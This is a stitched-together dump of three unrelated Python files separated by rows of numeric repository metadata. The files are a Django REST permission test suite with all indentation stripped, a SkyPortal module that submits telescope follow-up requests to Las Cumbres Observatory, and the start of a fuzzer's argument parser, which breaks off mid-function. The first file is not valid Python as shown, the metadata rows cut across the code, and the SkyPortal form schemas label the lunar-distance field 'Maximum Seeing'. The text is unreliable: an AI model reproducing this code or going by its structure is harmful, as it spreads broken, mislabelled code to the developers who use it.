self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
class ResourceUpdateLimitedPermissionTestCase(object):
def get_patch_response(self, request_data):
user_id = getattr(getattr(self.resource, 'user', None), 'id', None)
return self.client_patch_auth(
reverse(self.resource_view_name, args=(self.resource.id,)),
user_role=self.USER_ROLE,
user_id=user_id,
company_permissions=getattr(self, 'company_permissions', {}),
data=ujson.dumps(request_data),
content_type='application/vnd.api+json'
)
def test_update__resource(self):
attribute_name = self.attributes[0]
new_attribute_value = self.new_attribute_values[0]
update_data = self.patch_request_stub
update_data['data']['attributes'] = {attribute_name: new_attribute_value}
response = self.get_patch_response(update_data)
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_update__incorrect_type(self):
attribute_name = self.attributes[0]
new_attribute_value = self.new_attribute_values[0]
update_data = self.patch_request_stub
update_data['data']['type'] = 'RandomType'
update_data['data']['attributes'] = {attribute_name: new_attribute_value}
response = self.get_patch_response(update_data)
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_update__multiple_fields(self):
if len(self.new_attribute_values) < 2:
return True
attribute_name_1 = self.attributes[0]
new_attribute_value_1 = self.new_attribute_values[0]
attribute_name_2 = self.attributes[1]
new_attribute_value_2 = self.new_attribute_values[1]
update_data = self.patch_request_stub
update_data['data']['attributes'] = {
attribute_name_1: new_attribute_value_1,
attribute_name_2: new_attribute_value_2
}
response = self.get_patch_response(update_data)
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_update__missing_item_404(self):
attribute_name = self.attributes[0]
new_attribute_value = self.new_attribute_values[0]
update_data = self.patch_request_stub
update_data['data']['id'] = 12457
update_data['data']['attributes'] = {attribute_name: new_attribute_value}
response = self.client_patch_auth(
reverse(self.resource_view_name, args=(12457,)),
user_role=self.USER_ROLE,
data=ujson.dumps(update_data),
content_type='application/vnd.api+json'
)
self.failure_response_structure_test(response, status.HTTP_404_NOT_FOUND)
def test_update__unauthorized(self):
attribute_name = self.attributes[0]
new_attribute_value = self.new_attribute_values[0]
update_data = self.patch_request_stub
update_data['data']['attributes'] = {attribute_name: new_attribute_value}
response = self.client_patch_auth(
reverse(self.resource_view_name, args=(self.resource.id,)),
data=ujson.dumps(update_data),
content_type='application/vnd.api+json'
)
self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
class ResourceUpdateWithoutPermissionTestCase(ResourceUpdateLimitedPermissionTestCase):
# Overriding method, when no permission we return a 403 instead of a 404
def test_update__missing_item_404(self):
attribute_name = self.attributes[0]
new_attribute_value = self.new_attribute_values[0]
update_data = self.patch_request_stub
update_data['data']['id'] = 12457
update_data['data']['attributes'] = {attribute_name: new_attribute_value}
response = self.client_patch_auth(
reverse(self.resource_view_name, args=(12457,)),
user_role=self.USER_ROLE,
data=ujson.dumps(update_data),
content_type='application/vnd.api+json'
)
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
class ResourceFlaggedDeleteTestCase(object):
def test_resource(self):
url = reverse(self.resource_view_name, args=(self.resource.id,))
response = self.client_delete_auth(
url,
user_role=self.USER_ROLE,
company_permissions=getattr(self, 'company_permissions', {}))
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# Verify that the object still exists and that the deleted_at field has been set
deleted_resource = self.resource_class.objects.filter(id=self.resource.id)
self.assertEqual(deleted_resource.count(), 1)
self.assertIsNotNone(deleted_resource[0].deleted_at)
def test_delete__404_for_nonexistant_resource(self):
url = reverse(self.resource_view_name, args=(9999,))
response = self.client_delete_auth(url, user_role=self.USER_ROLE)
self.failure_response_structure_test(response, status.HTTP_404_NOT_FOUND)
def test_delete__unauthorized(self):
url = reverse(self.resource_view_name, args=(self.resource.id,))
response = self.client_delete_auth(url)
self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
class ResourceDeleteTestCase(object):
def test_delete_resource__by_user(self):
if not hasattr(self.resource, 'user'):
return True
resource = self.resource_class.objects.filter(id=self.resource.id)
self.assertEqual(resource.count(), 1)
url = reverse(self.resource_view_name, args=(self.resource.id,))
response = self.client_delete_auth(
url,
user_role=self.USER_ROLE,
user_id=self.resource.user.id,
company_permissions=getattr(self, 'company_permissions', {}))
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
deleted_resource = self.resource_class.objects.filter(id=self.resource.id)
self.assertEqual(deleted_resource.count(), 0)
def test_delete_resource__by_staff(self):
resource = self.resource_class.objects.filter(id=self.resource.id)
self.assertEqual(resource.count(), 1)
url = reverse(self.resource_view_name, args=(self.resource.id,))
response = self.client_delete_auth(
url,
user_role=STAFF,
company_permissions=getattr(self, 'company_permissions', {}))
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
deleted_resource = self.resource_class.objects.filter(id=self.resource.id)
self.assertEqual(deleted_resource.count(), 0)
def test_delete__404_for_nonexistant_resource(self):
url = reverse(self.resource_view_name, args=(9999,))
response = self.client_delete_auth(url, user_role=STAFF)
self.failure_response_structure_test(response, status.HTTP_404_NOT_FOUND)
def test_delete__unauthorized(self):
url = reverse(self.resource_view_name, args=(self.resource.id,))
response = self.client_delete_auth(url)
self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
def test_delete__forbidden(self):
url = reverse(self.resource_view_name, args=(self.resource.id,))
response = self.client_delete_auth(url, user_role=USER)
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
class ResourceNoDeleteTestCase(object):
def test_delete_resource__by_user(self):
if not hasattr(self.resource, 'user'):
return True
resource = self.resource_class.objects.filter(id=self.resource.id)
self.assertEqual(resource.count(), 1)
url = reverse(self.resource_view_name, args=(self.resource.id,))
response = self.client_delete_auth(url, user_role=self.USER_ROLE, user_id=self.resource.user.id)
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_delete_resource__by_staff(self):
url = reverse(self.resource_view_name, args=(self.resource.id,))
response = self.client_delete_auth(url, user_role=self.USER_ROLE)
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_delete__for_nonexistant_resource(self):
url = reverse(self.resource_view_name, args=(9999,))
response = self.client_delete_auth(url, user_role=self.USER_ROLE)
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_delete__unauthorized(self):
url = reverse(self.resource_view_name, args=(self.resource.id,))
response = self.client_delete_auth(url)
self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
def test_delete__forbidden(self):
url = reverse(self.resource_view_name, args=(self.resource.id,))
response = self.client_delete_auth(url, user_role=self.USER_ROLE)
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
class ResourceDeleteWithoutPermissionTestCase(ResourceNoDeleteTestCase):
pass
class ResourceDeleteLimitedTestCase(ResourceNoDeleteTestCase):
def test_delete__for_nonexistant_resource(self):
url = reverse(self.resource_view_name, args=(9999,))
response = self.client_delete_auth(url, user_role=self.USER_ROLE)
self.failure_response_structure_test(response, status.HTTP_404_NOT_FOUND)
| 40.28023
| 114
| 0.700801
| 2,538
| 20,986
| 5.418046
| 0.066588
| 0.067195
| 0.046978
| 0.075922
| 0.932587
| 0.920224
| 0.920224
| 0.898262
| 0.898262
| 0.896953
| 0
| 0.015252
| 0.209568
| 20,986
| 520
| 115
| 40.357692
| 0.813721
| 0.00872
| 0
| 0.864789
| 0
| 0
| 0.049187
| 0.021925
| 0
| 0
| 0
| 0
| 0.03662
| 1
| 0.115493
| false
| 0.002817
| 0.019718
| 0
| 0.197183
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b180d1f8b2ee3a8671147b7174fd61649ac75c2e
| 31,365
|
py
|
Python
|
skyportal/facility_apis/lco.py
|
bparazin/skyportal
|
c160610ca0cc28eef9f36c2d11cc15bd9bcbfe56
|
[
"BSD-3-Clause"
] | 52
|
2018-11-02T00:53:21.000Z
|
2022-03-08T16:03:52.000Z
|
skyportal/facility_apis/lco.py
|
bparazin/skyportal
|
c160610ca0cc28eef9f36c2d11cc15bd9bcbfe56
|
[
"BSD-3-Clause"
] | 1,944
|
2017-04-27T18:51:20.000Z
|
2022-03-31T20:17:44.000Z
|
skyportal/facility_apis/lco.py
|
bparazin/skyportal
|
c160610ca0cc28eef9f36c2d11cc15bd9bcbfe56
|
[
"BSD-3-Clause"
] | 63
|
2017-05-13T01:40:47.000Z
|
2022-03-12T11:32:11.000Z
|
import json
import requests
from datetime import datetime, timedelta
from . import FollowUpAPI
from baselayer.app.env import load_env
from ..utils import http
env, cfg = load_env()
requestpath = f"{cfg['app.lco_protocol']}://{cfg['app.lco_host']}:{cfg['app.lco_port']}/api/requestgroups/"
class SINISTRORequest:
"""A JSON structure for LCO 1m SINISTRO requests."""
def __init__(self, request):
"""Initialize SINISTRO request.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
"""
self.requestgroup = self._build_payload(request)
def _build_payload(self, request):
"""Payload json for LCO 1m SINISTRO queue requests.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
Returns
----------
payload: json
payload for requests.
"""
# Constraints used for scheduling this observation
constraints = {
'max_airmass': request.payload["maximum_airmass"],
'min_lunar_distance': 30,
}
# The target of the observation
target = {
'name': request.obj.id,
'type': 'ICRS',
'ra': request.obj.ra,
'dec': request.obj.dec,
'epoch': 2000,
}
exp_time = request.payload["exposure_time"]
exp_count = int(request.payload["exposure_counts"])
configurations = []
for filt in request.payload['observation_choices']:
configurations.append(
{
'type': 'EXPOSE',
'instrument_type': '1M0-SCICAM-SINISTRO',
'constraints': constraints,
'target': target,
'acquisition_config': {},
'guiding_config': {},
'instrument_configs': [
{
'exposure_time': exp_time,
'exposure_count': exp_count,
'optical_elements': {'filter': '%s' % filt},
}
],
}
)
tstart = request.payload["start_date"] + ' 00:00:00'
tend = request.payload["end_date"] + ' 00:00:00'
windows = [{'start': tstart, 'end': tend}]
# The telescope class that should be used for this observation
location = {'telescope_class': '1m0'}
altdata = request.allocation.altdata
# The full RequestGroup, with additional meta-data
requestgroup = {
'name': '%s' % (request.obj.id), # The title
'proposal': altdata["PROPOSAL_ID"],
'ipp_value': request.payload["priority"],
'operator': 'SINGLE',
'observation_type': 'NORMAL',
'requests': [
{
'configurations': configurations,
'windows': windows,
'location': location,
}
],
}
return requestgroup
class SPECTRALRequest:
"""A JSON structure for LCO 2m SPECTRAL requests."""
def __init__(self, request):
"""Initialize SPECTRAL request.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
"""
self.requestgroup = self._build_payload(request)
def _build_payload(self, request):
"""Payload json for LCO 2m SPECTRAL queue requests.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
Returns
----------
payload: json
payload for requests.
"""
if request.obj.dec > 17:
raise ValueError('Spectral only available in South.')
# Constraints used for scheduling this observation
constraints = {
'max_airmass': request.payload["maximum_airmass"],
'min_lunar_distance': request.payload["minimum_lunar_distance"],
}
# The target of the observation
target = {
'name': request.obj.id,
'type': 'ICRS',
'ra': request.obj.ra,
'dec': request.obj.dec,
'epoch': 2000,
}
exp_time = request.payload["exposure_time"]
exp_count = int(request.payload["exposure_counts"])
configurations = []
for filt in request.payload['observation_choices']:
configurations.append(
{
'type': 'EXPOSE',
'instrument_type': '2M0-SCICAM-SPECTRAL',
'constraints': constraints,
'target': target,
'acquisition_config': {},
'guiding_config': {},
'instrument_configs': [
{
'exposure_time': exp_time,
'exposure_count': exp_count,
'optical_elements': {'filter': '%s' % filt},
}
],
}
)
tstart = request.payload["start_date"] + ' 00:00:00'
tend = request.payload["end_date"] + ' 00:00:00'
windows = [{'start': tstart, 'end': tend}]
# The telescope class that should be used for this observation
location = {'telescope_class': '2m0'}
altdata = request.allocation.altdata
# The full RequestGroup, with additional meta-data
requestgroup = {
'name': '%s' % (request.obj.id), # The title
'proposal': altdata["PROPOSAL_ID"],
'ipp_value': request.payload["priority"],
'operator': 'SINGLE',
'observation_type': 'NORMAL',
'requests': [
{
'configurations': configurations,
'windows': windows,
'location': location,
}
],
}
return requestgroup
class MUSCATRequest:
"""An XML structure for LCO 2m MUSCAT requests."""
def __init__(self, request):
"""Initialize MUSCAT request.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
"""
self.requestgroup = self._build_payload(request)
def _build_payload(self, request):
"""Payload json for LCO 2m MUSCAT queue requests.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
Returns
----------
payload: json
payload for requests.
"""
# Constraints used for scheduling this observation
constraints = {
'max_airmass': request.payload["maximum_airmass"],
'min_lunar_distance': request.payload["minimum_lunar_distance"],
}
# The target of the observation
target = {
'name': request.obj.id,
'type': 'ICRS',
'ra': request.obj.ra,
'dec': request.obj.dec,
'epoch': 2000,
}
exp_time = request.payload["exposure_time"]
exp_count = int(request.payload["exposure_counts"])
configurations = [
{
'type': 'EXPOSE',
'instrument_type': '2M0-SCICAM-MUSCAT',
'target': target,
'constraints': constraints,
'acquisition_config': {},
'guiding_config': {},
'instrument_configs': [
{
'exposure_time': exp_time,
'exposure_count': exp_count,
'optical_elements': {
'diffuser_g_position': 'out',
'diffuser_r_position': 'out',
'diffuser_i_position': 'out',
'diffuser_z_position': 'out',
},
'extra_params': {
'exposure_mode': 'SYNCHRONOUS',
'exposure_time_g': exp_time,
'exposure_time_r': exp_time,
'exposure_time_i': exp_time,
'exposure_time_z': exp_time,
},
}
],
}
]
tstart = request.payload["start_date"] + ' 00:00:00'
tend = request.payload["end_date"] + ' 00:00:00'
windows = [{'start': tstart, 'end': tend}]
# The telescope class that should be used for this observation
location = {'telescope_class': '2m0'}
altdata = request.allocation.altdata
# The full RequestGroup, with additional meta-data
requestgroup = {
'name': '%s' % (request.obj.id), # The title
'proposal': altdata["PROPOSAL_ID"],
'ipp_value': request.payload["priority"],
'operator': 'SINGLE',
'observation_type': 'NORMAL',
'requests': [
{
'configurations': configurations,
'windows': windows,
'location': location,
}
],
}
return requestgroup
class FLOYDSRequest:
"""An XML structure for LCO 2m FLOYDS requests."""
def __init__(self, request):
"""Initialize FLOYDS request.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
"""
self.requestgroup = self._build_payload(request)
def _build_payload(self, request):
"""Payload header for LCO 2m FLOYDS queue requests.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
Returns
----------
payload: json
payload for requests.
"""
# Constraints used for scheduling this observation
constraints = {
'max_airmass': request.payload["maximum_airmass"],
'min_lunar_distance': request.payload["minimum_lunar_distance"],
}
# The target of the observation
target = {
'name': request.obj.id,
'type': 'ICRS',
'ra': request.obj.ra,
'dec': request.obj.dec,
'epoch': 2000,
}
# The telescope class that should be used for this observation
location = {'telescope_class': '2m0'}
exp_time = request.payload["exposure_time"]
exp_count = int(request.payload["exposure_counts"])
configurations = [
{
'type': 'LAMP_FLAT',
'instrument_type': '2M0-FLOYDS-SCICAM',
'constraints': constraints,
'target': target,
'acquisition_config': {},
'guiding_config': {'mode': 'OFF', 'optional': False},
'instrument_configs': [
{
'exposure_time': 50,
'exposure_count': 1,
'rotator_mode': 'VFLOAT',
'optical_elements': {'slit': 'slit_1.6as'},
}
],
},
{
'type': 'ARC',
'instrument_type': '2M0-FLOYDS-SCICAM',
'constraints': constraints,
'target': target,
'acquisition_config': {},
'guiding_config': {'mode': 'OFF', 'optional': False},
'instrument_configs': [
{
'exposure_time': 60,
'exposure_count': 1,
'rotator_mode': 'VFLOAT',
'optical_elements': {'slit': 'slit_1.6as'},
}
],
},
{
'type': 'SPECTRUM',
'instrument_type': '2M0-FLOYDS-SCICAM',
'constraints': constraints,
'target': target,
'acquisition_config': {'mode': 'WCS'},
'guiding_config': {'mode': 'ON', 'optional': False},
'instrument_configs': [
{
'exposure_time': exp_time,
'exposure_count': exp_count,
'rotator_mode': 'VFLOAT',
'optical_elements': {'slit': 'slit_1.6as'},
}
],
},
{
'type': 'ARC',
'instrument_type': '2M0-FLOYDS-SCICAM',
'constraints': constraints,
'target': target,
'acquisition_config': {},
'guiding_config': {'mode': 'OFF', 'optional': False},
'instrument_configs': [
{
'exposure_time': 60,
'exposure_count': 1,
'rotator_mode': 'VFLOAT',
'optical_elements': {'slit': 'slit_1.6as'},
}
],
},
{
'type': 'LAMP_FLAT',
'instrument_type': '2M0-FLOYDS-SCICAM',
'constraints': constraints,
'target': target,
'acquisition_config': {},
'guiding_config': {'mode': 'OFF', 'optional': False},
'instrument_configs': [
{
'exposure_time': 50,
'exposure_count': 1,
'rotator_mode': 'VFLOAT',
'optical_elements': {'slit': 'slit_1.6as'},
}
],
},
]
tstart = request.payload["start_date"] + ' 00:00:00'
tend = request.payload["end_date"] + ' 00:00:00'
windows = [{'start': tstart, 'end': tend}]
altdata = request.allocation.altdata
# The full RequestGroup, with additional meta-data
requestgroup = {
'name': '%s' % (request.obj.id), # The title
'proposal': altdata["PROPOSAL_ID"],
'ipp_value': request.payload["priority"],
'operator': 'SINGLE',
'observation_type': 'NORMAL',
'requests': [
{
'configurations': configurations,
'windows': windows,
'location': location,
}
],
}
return requestgroup
class LCOAPI(FollowUpAPI):
"""An interface to LCO operations."""
@staticmethod
def delete(request):
"""Delete a follow-up request from LCO queue (all instruments).
Parameters
----------
request: skyportal.models.FollowupRequest
The request to delete from the queue and the SkyPortal database.
"""
from ..models import DBSession, FollowupRequest, FacilityTransaction
req = (
DBSession()
.query(FollowupRequest)
.filter(FollowupRequest.id == request.id)
.one()
)
altdata = request.allocation.altdata
if not altdata:
raise ValueError('Missing allocation information.')
content = req.transactions[0].response["content"]
content = json.loads(content)
uid = content["id"]
r = requests.post(
f"{requestpath}{uid}/cancel/",
headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
)
r.raise_for_status()
request.status = "deleted"
transaction = FacilityTransaction(
request=http.serialize_requests_request(r.request),
response=http.serialize_requests_response(r),
followup_request=request,
initiator_id=request.last_modified_by_id,
)
DBSession().add(transaction)
@staticmethod
def update(request):
"""Update a follow-up request from LCO queue (all instruments).
Parameters
----------
request: skyportal.models.FollowupRequest
The request to update from the queue and the SkyPortal database.
"""
from ..models import DBSession, FollowupRequest, FacilityTransaction
req = (
DBSession()
.query(FollowupRequest)
.filter(FollowupRequest.id == request.id)
.one()
)
# this happens for failed submissions
# just go ahead and delete
if len(req.transactions) == 0:
DBSession().query(FollowupRequest).filter(
FollowupRequest.id == request.id
).delete()
DBSession().commit()
return
altdata = request.allocation.altdata
if not altdata:
raise ValueError('Missing allocation information.')
content = req.transactions[0].response["content"]
content = json.loads(content)
uid = content["id"]
r = requests.get(
f"{requestpath}{uid}/",
headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
)
r.raise_for_status()
content = req.transactions[0].response["content"]
content = json.loads(content)
if content["state"] == "COMPLETED":
request.status = "complete"
transaction = FacilityTransaction(
request=http.serialize_requests_request(r.request),
response=http.serialize_requests_response(r),
followup_request=request,
initiator_id=request.last_modified_by_id,
)
DBSession().add(transaction)
class SINISTROAPI(LCOAPI):
"""An interface to LCO SINISTRO operations."""
# subclasses *must* implement the method below
@staticmethod
def submit(request):
"""Submit a follow-up request to LCO's SINISTRO.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
"""
from ..models import FacilityTransaction, DBSession
altdata = request.allocation.altdata
if not altdata:
raise ValueError('Missing allocation information.')
lcoreq = SINISTRORequest(request)
requestgroup = lcoreq.requestgroup
r = requests.post(
requestpath,
headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
json=requestgroup, # Make sure you use json!
)
r.raise_for_status()
if r.status_code == 201:
request.status = 'submitted'
else:
request.status = f'rejected: {r.content}'
transaction = FacilityTransaction(
request=http.serialize_requests_request(r.request),
response=http.serialize_requests_response(r),
followup_request=request,
initiator_id=request.last_modified_by_id,
)
DBSession().add(transaction)
form_json_schema = {
"type": "object",
"properties": {
"observation_choices": {
"type": "array",
"title": "Desired Observations",
"items": {"type": "string", "enum": ["gp", "rp", "ip", "zs", "Y"]},
"uniqueItems": True,
"minItems": 1,
},
"exposure_time": {
"title": "Exposure Time [s]",
"type": "number",
"default": 300.0,
},
"exposure_counts": {
"title": "Exposure Counts",
"type": "number",
"default": 1,
},
"start_date": {
"type": "string",
"format": "date",
"default": datetime.utcnow().date().isoformat(),
"title": "Start Date (UT)",
},
"end_date": {
"type": "string",
"format": "date",
"title": "End Date (UT)",
"default": (datetime.utcnow().date() + timedelta(days=7)).isoformat(),
},
"maximum_airmass": {
"title": "Maximum Airmass (1-3)",
"type": "number",
"default": 2.0,
"minimum": 1,
"maximum": 3,
},
"minimum_lunar_distance": {
"title": "Maximum Seeing [arcsec] (0-180)",
"type": "number",
"default": 30.0,
"minimum": 0,
"maximum": 180,
},
"priority": {
"title": "IPP (0-2)",
"type": "number",
"default": 1.0,
"minimum": 0,
"maximum": 2,
},
},
"required": [
"start_date",
"end_date",
"maximum_airmass",
"minimum_lunar_distance",
"priority",
],
}
ui_json_schema = {"observation_choices": {"ui:widget": "checkboxes"}}
class SPECTRALAPI(LCOAPI):
"""An interface to LCO SPECTRAL operations."""
# subclasses *must* implement the method below
@staticmethod
def submit(request):
"""Submit a follow-up request to LCO's SPECTRAL.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
"""
from ..models import FacilityTransaction, DBSession
altdata = request.allocation.altdata
if not altdata:
raise ValueError('Missing allocation information.')
lcoreq = SPECTRALRequest(request)
requestgroup = lcoreq.requestgroup
r = requests.post(
requestpath,
headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
json=requestgroup, # Make sure you use json!
)
r.raise_for_status()
if r.status_code == 201:
request.status = 'submitted'
else:
request.status = f'rejected: {r.content}'
transaction = FacilityTransaction(
request=http.serialize_requests_request(r.request),
response=http.serialize_requests_response(r),
followup_request=request,
initiator_id=request.last_modified_by_id,
)
DBSession().add(transaction)
form_json_schema = {
"type": "object",
"properties": {
"observation_choices": {
"type": "array",
"title": "Desired Observations",
"items": {"type": "string", "enum": ["gp", "rp", "ip", "zs", "Y"]},
"uniqueItems": True,
"minItems": 1,
},
"exposure_time": {
"title": "Exposure Time [s]",
"type": "number",
"default": 300.0,
},
"exposure_counts": {
"title": "Exposure Counts",
"type": "number",
"default": 1,
},
"start_date": {
"type": "string",
"format": "date",
"default": datetime.utcnow().date().isoformat(),
"title": "Start Date (UT)",
},
"end_date": {
"type": "string",
"format": "date",
"title": "End Date (UT)",
"default": (datetime.utcnow().date() + timedelta(days=7)).isoformat(),
},
"maximum_airmass": {
"title": "Maximum Airmass (1-3)",
"type": "number",
"default": 2.0,
"minimum": 1,
"maximum": 3,
},
"minimum_lunar_distance": {
"title": "Maximum Seeing [arcsec] (0-180)",
"type": "number",
"default": 30.0,
"minimum": 0,
"maximum": 180,
},
"priority": {
"title": "IPP (0-2)",
"type": "number",
"default": 1.0,
"minimum": 0,
"maximum": 2,
},
},
"required": [
"start_date",
"end_date",
"maximum_airmass",
"minimum_lunar_distance",
"priority",
],
}
ui_json_schema = {"observation_choices": {"ui:widget": "checkboxes"}}
class MUSCATAPI(LCOAPI):
"""An interface to LCO MUSCAT operations."""
# subclasses *must* implement the method below
@staticmethod
def submit(request):
"""Submit a follow-up request to LCO's MUSCAT.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
"""
from ..models import FacilityTransaction, DBSession
altdata = request.allocation.altdata
if not altdata:
raise ValueError('Missing allocation information.')
lcoreq = MUSCATRequest(request)
requestgroup = lcoreq.requestgroup
r = requests.post(
requestpath,
headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
json=requestgroup, # Make sure you use json!
)
r.raise_for_status()
if r.status_code == 201:
request.status = 'submitted'
else:
request.status = f'rejected: {r.content}'
transaction = FacilityTransaction(
request=http.serialize_requests_request(r.request),
response=http.serialize_requests_response(r),
followup_request=request,
initiator_id=request.last_modified_by_id,
)
DBSession().add(transaction)
form_json_schema = {
"type": "object",
"properties": {
"exposure_time": {
"title": "Exposure Time [s]",
"type": "number",
"default": 300.0,
},
"exposure_counts": {
"title": "Exposure Counts",
"type": "number",
"default": 1,
},
"start_date": {
"type": "string",
"format": "date",
"default": datetime.utcnow().date().isoformat(),
"title": "Start Date (UT)",
},
"end_date": {
"type": "string",
"format": "date",
"title": "End Date (UT)",
"default": (datetime.utcnow().date() + timedelta(days=7)).isoformat(),
},
"maximum_airmass": {
"title": "Maximum Airmass (1-3)",
"type": "number",
"default": 2.0,
"minimum": 1,
"maximum": 3,
},
"minimum_lunar_distance": {
"title": "Maximum Seeing [arcsec] (0-180)",
"type": "number",
"default": 30.0,
"minimum": 0,
"maximum": 180,
},
"priority": {
"title": "IPP (0-2)",
"type": "number",
"default": 1.0,
"minimum": 0,
"maximum": 2,
},
},
"required": [
"start_date",
"end_date",
"maximum_airmass",
"minimum_lunar_distance",
"priority",
],
}
ui_json_schema = {}
class FLOYDSAPI(LCOAPI):
"""An interface to LCO FLOYDS operations."""
# subclasses *must* implement the method below
@staticmethod
def submit(request):
"""Submit a follow-up request to LCO's FLOYDS.
Parameters
----------
request: skyportal.models.FollowupRequest
The request to add to the queue and the SkyPortal database.
"""
from ..models import FacilityTransaction, DBSession
altdata = request.allocation.altdata
if not altdata:
raise ValueError('Missing allocation information.')
lcoreq = FLOYDSRequest(request)
requestgroup = lcoreq.requestgroup
r = requests.post(
requestpath,
headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
json=requestgroup, # Make sure you use json!
)
r.raise_for_status()
if r.status_code == 201:
request.status = 'submitted'
else:
request.status = f'rejected: {r.content}'
transaction = FacilityTransaction(
request=http.serialize_requests_request(r.request),
response=http.serialize_requests_response(r),
followup_request=request,
initiator_id=request.last_modified_by_id,
)
DBSession().add(transaction)
form_json_schema = {
"type": "object",
"properties": {
"exposure_time": {
"title": "Exposure Time [s]",
"type": "number",
"default": 300.0,
},
"exposure_counts": {
"title": "Exposure Counts",
"type": "number",
"default": 1,
},
"start_date": {
"type": "string",
"format": "date",
"default": datetime.utcnow().date().isoformat(),
"title": "Start Date (UT)",
},
"end_date": {
"type": "string",
"format": "date",
"title": "End Date (UT)",
"default": (datetime.utcnow().date() + timedelta(days=7)).isoformat(),
},
"maximum_airmass": {
"title": "Maximum Airmass (1-3)",
"type": "number",
"default": 2.0,
"minimum": 1,
"maximum": 3,
},
"minimum_lunar_distance": {
"title": "Maximum Seeing [arcsec] (0-180)",
"type": "number",
"default": 30.0,
"minimum": 0,
"maximum": 180,
},
"priority": {
"title": "IPP (0-2)",
"type": "number",
"default": 1.0,
"minimum": 0,
"maximum": 2,
},
},
"required": [
"start_date",
"end_date",
"maximum_airmass",
"minimum_lunar_distance",
"priority",
],
}
ui_json_schema = {}
| 30.36302
| 107
| 0.479228
| 2,565
| 31,365
| 5.726316
| 0.106823
| 0.031454
| 0.023148
| 0.030501
| 0.916326
| 0.907612
| 0.89134
| 0.89134
| 0.887187
| 0.887187
| 0
| 0.013587
| 0.399267
| 31,365
| 1,032
| 108
| 30.392442
| 0.765948
| 0.133301
| 0
| 0.767832
| 0
| 0.001399
| 0.226978
| 0.018608
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01958
| false
| 0
| 0.016783
| 0
| 0.067133
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
490a49a5edd6ecbbed644c8bc070e14c25355983
| 4,569
|
py
|
Python
|
pythonfuzz/main.py
|
MJ-SEO/py_fuzz
|
789fbfea21bf644ba4d00554fe4141694b0a190a
|
[
"Apache-2.0"
] | null | null | null |
pythonfuzz/main.py
|
MJ-SEO/py_fuzz
|
789fbfea21bf644ba4d00554fe4141694b0a190a
|
[
"Apache-2.0"
] | null | null | null |
pythonfuzz/main.py
|
MJ-SEO/py_fuzz
|
789fbfea21bf644ba4d00554fe4141694b0a190a
|
[
"Apache-2.0"
] | null | null | null |
import argparse
from re import S
from pythonfuzz import fuzzer
class PythonFuzz(object):
def __init__(self, func):
self.function = func
def __call__(self, *args, **kwargs):
parser = argparse.ArgumentParser(description='Coverage-guided fuzzer for python packages')
parser.add_argument('dirs', type=str, nargs='*',
help="one or more directories/files to use as seed corpus. the first directory will be used to save the generated test-cases")
parser.add_argument('--exact-artifact-path', type=str, help='set exact artifact path for crashes/ooms')
parser.add_argument('--regression',
type=bool,
default=False,
help='run the fuzzer through set of files for regression or reproduction')
parser.add_argument('--rss-limit-mb', type=int, default=4096, help='Memory usage in MB')
parser.add_argument('--max-input-size', type=int, default=4096, help='Max input size in bytes')
parser.add_argument('--dict', type=str, help='dictionary file')
parser.add_argument('--close-fd-mask', type=int, default=0, help='Indicate output streams to close at startup')
parser.add_argument('--runs', type=int, default=-1, help='Number of individual test runs, -1 (the default) to run indefinitely.')
parser.add_argument('--timeout', type=int, default=5,
help='If input takes longer then this timeout the process is treated as failure case')
parser.add_argument('--inf-run', default=False, action='store_true', help='Decide the fuzzing wherter stop or keep runing after it finds a failure') # added
parser.add_argument('--sched', type=str, default=None, help='Decide the schduler of fuzzing') # added
args = parser.parse_args()
